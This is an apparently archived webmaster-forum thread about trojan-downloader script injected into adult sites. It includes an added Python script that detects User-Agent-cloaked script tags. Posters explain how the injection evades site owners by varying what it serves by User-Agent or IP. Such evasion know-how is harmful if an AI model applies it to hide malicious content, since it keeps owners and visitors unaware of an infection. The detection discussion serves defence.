:(
|
Shemp, did you get me right?
That is the host who redirects traffic. Your webmaster maybe doesn't know about the redirection; just recommend that he move the site to another host.
fusionx, there are too many trojan.downloader versions, but as far as I can remember, the second file (even if it is downloaded from the same URL) is another file; the second file opens a few ports on your computer and it is ready to download and run ANY PROGRAM. Downloaded programs do the rest. |
Tommy from Tommy's Bookmarks was recently having a similar problem.
Nothing seemed to show up for him but a lot of other people were seeing it. I'm not sure what he did to get rid of it. |
Quote:
we don't allow free hosts for preferred submitters... the webmaster must have complete control of the domains. that's part of the agreement of getting a submit account with us.. |
fusionx, you have to let it download second program first, but it is dangerous.
Shemp, ok, understand, good rule. |
so snake's server is hacked?
or how the hell did that thing get there? man this is scary |
My server hasn't been hacked. I don't get the code, I think it's a jscript exploit that takes advantage of certain browsers. But I'm still looking into it.
|
I got a virus on my laptop, and I can't get rid of it! And now I can't not surf, and my wireless connection is totally nonexistent (not even showing up on the Network Connections screen).
This fucking sucks!!! And they are chasing spammers? WTF? |
Sorry, Snake, but I see this code if I download your page without any browser, so it cannot be a problem of certain browsers.
GoLiaT, either snakesworld was hacked, or his hosting provider was hacked, or (only in theory) he inserted this code himself. |
Quote:
are you using (wget, or something else?). I'd like to see if I can duplicate from here. - Thanks, jpoker |
If it was hacked don't you think I would be able to see the code? I haven't seen it yet on any of my pages.
I did see it on Pornno.com though so I'm still trying to figure out why I can see it on his page and not mine. Any tech geniuses want to throw in a couple cents? |
This is the source I got at the bottom of the aforementioned 'links' page:
|
I just did a wget from one of my unix servers to http://www.snakesworld.com/links.html
and I don't see any of this code. - F |
jpoker,
In any UNIX shell run command

    telnet www.snakesworld.com 80

You will see something like this:

    Trying 64.158.30.220...
    Connected to 64.158.30.220.
    Escape character is '^]'.

Then type something like this:

    GET /links.html HTTP/1.0
    Host: www.snakesworld.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
    Accept-Language: en
    Accept-Charset: iso-8859-1,*,utf-8
    Accept: */*
    Connection: close

And press "Enter" twice, and you will see the page source code.

Snake, no I do not think so. Have you turned off cookies? Which IP addresses did you use to see your page? From how many computers did you try to do it? |
jpoker,
this system checks User-Agent, so wget will not work |
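The comparison the two posts above describe, written out as an added example that is not part of the original thread: it builds the same raw HTTP/1.0 request as the telnet session and reports `<script>` tags that are served to a browser User-Agent but not to a command-line tool. The `Wget/1.9` string, the function names and the two sample responses are constructed for illustration.

```python
import re
import socket

# User-Agent string taken from the telnet session in the post above.
BROWSER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
TOOL_UA = "Wget/1.9"  # assumed value standing in for a command-line fetcher

def build_request(host, path, user_agent):
    """Raw HTTP/1.0 request carrying the same headers as the telnet session."""
    headers = [
        f"GET {path} HTTP/1.0",
        f"Host: {host}",
        f"User-Agent: {user_agent}",
        "Accept-Language: en",
        "Accept-Charset: iso-8859-1,*,utf-8",
        "Accept: */*",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("ascii")

def fetch(host, path, user_agent, port=80, timeout=10):
    """Send the request over a plain socket and return the full raw response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, path, user_agent))
        chunks = []
        while chunk := sock.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)

SCRIPT_TAG = re.compile(rb"<script\b[^>]*>", re.IGNORECASE)

def script_tags(response):
    """Lower-cased opening <script> tags found in the body of a raw response."""
    _, _, body = response.partition(b"\r\n\r\n")
    return {m.group(0).lower() for m in SCRIPT_TAG.finditer(body)}

def only_for_browser(browser_resp, tool_resp):
    """Script tags served to the browser User-Agent but not to the tool."""
    return sorted(script_tags(browser_resp) - script_tags(tool_resp))

# Constructed sample responses (not captured from any real server).
CLEAN = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>links</body></html>"
INJECTED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>links"
            b'<SCRIPT LANGUAGE="JScript.Encode">...</SCRIPT></body></html>')

if __name__ == "__main__":
    print(only_for_browser(INJECTED, CLEAN))
    # Live use: only_for_browser(fetch(h, p, BROWSER_UA), fetch(h, p, TOOL_UA))
```

A User-Agent comparison only covers that one condition; it will not reveal content that is varied by source IP address, which the thread also raises as a possibility.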
i don't believe it - snake registered for GFY before I did!!!!!!!!!!!!!
hey snake - get into vegas a day early - 2:30pm jan 3 is the TGP VIP party this year |
Quote:
snake runs a clean site and has NEVER screwed his surfers around, EVER. he's a straight up honest awesome guy I stand behind 100% |
comes up clean for me
|
Quote:
look in your startup folder |
Quote:
Snake, nortons goes off for me too on your page. |
Wtf is this bullshit. I didn't put anything on my site, and of course I can't see it either. :mad:
Now to figure out how to get rid of this shit. JJJ |
This makes me wonder how many people's sites are exploited, or machines for that matter.
I surf TGPs all the time looking for galleries and stuff and get popups and virus attempts, exploits and whatever all the time. |
couldn't the hacker check the ftp logs, and see what ip snake logs in from, and make sure any ip from that block sees the normal page?
|
I don't get this code on either site. They both come up clean for me.
|
JJJ, maybe you can read your own pages better.
Tell us please, what do you see on your main1.html page (via ftp or telnet) between
<FONT color=#000000 size=6>Asians</FONT></A>
and
<P> <FONT color=#ff0000 face=arial size=4>
Snake, when you write "There is no code on my pages between the area you mentioned", do you read your page source via browser or directly from your server via ftp or telnet? I asked what you see via ftp or telnet.
bigdog, yes, of course he could |
Steve, I do not see this code any more either.
So I hope we will hear from Snake and JJJ what they did to stop it. |
I am not seeing it either on both sites, I would have your host investigate how this happened.
|
can't see shit here, maybe only certain ip ranges get the exploit code?
|
OK, problem solved. Now I can go about my business. No details but there was a problem on my server and I assume JJJ's also. Everything should be clean and back to normal.
Thanks for all the help! |
Snake, did I get you right?
You do not want to help the others who can get the same problem in the future? Why can't you tell us how you got this trojan installer onto your page? |
Is there anyone that still gets this when visiting my main page?
http://www.pornno.com/main1.html I am not sure this problem has been corrected for sure on my site. JJJ |
this hacker shit is getting out of hand
|